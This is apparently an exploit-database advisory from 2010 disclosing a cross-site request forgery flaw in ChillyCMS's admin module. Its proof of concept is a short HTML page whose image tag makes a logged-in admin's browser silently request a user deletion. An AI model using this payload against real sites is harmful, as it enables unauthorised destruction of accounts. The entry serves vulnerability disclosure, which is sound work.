ChillyCMS - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-03-16 
date_updated:  
verified: 1 
codes: OSVDB-63029 
tags: 
aliases:  
screenshot_url:  
application_url: 

                                =======================================================================

                                                    chilly_CMS CSRF Vulnerability

                                =======================================================================





  # Vulnerability found in- Admin module

  # email         Pratulag@yahoo.com

  # company       aksitservices

  # Credit by     Pratul Agrawal

  # Software      chilly_CMS

  # Category  	  CMS / Portals

  # Plateform     php

  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)



  #  Proof of concept   #


   Script to Delete the Admin user through Cross Site request forgery

             .  ................................................................................................................

                        <html>

                          <body>

                              <img src=http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />

                          </body>

                        </html>

             .  ..................................................................................................................



  After execution refresh the page and u can see that a added content is deleted automatically.


  #If you have any questions, comments, or concerns, feel free to contact me.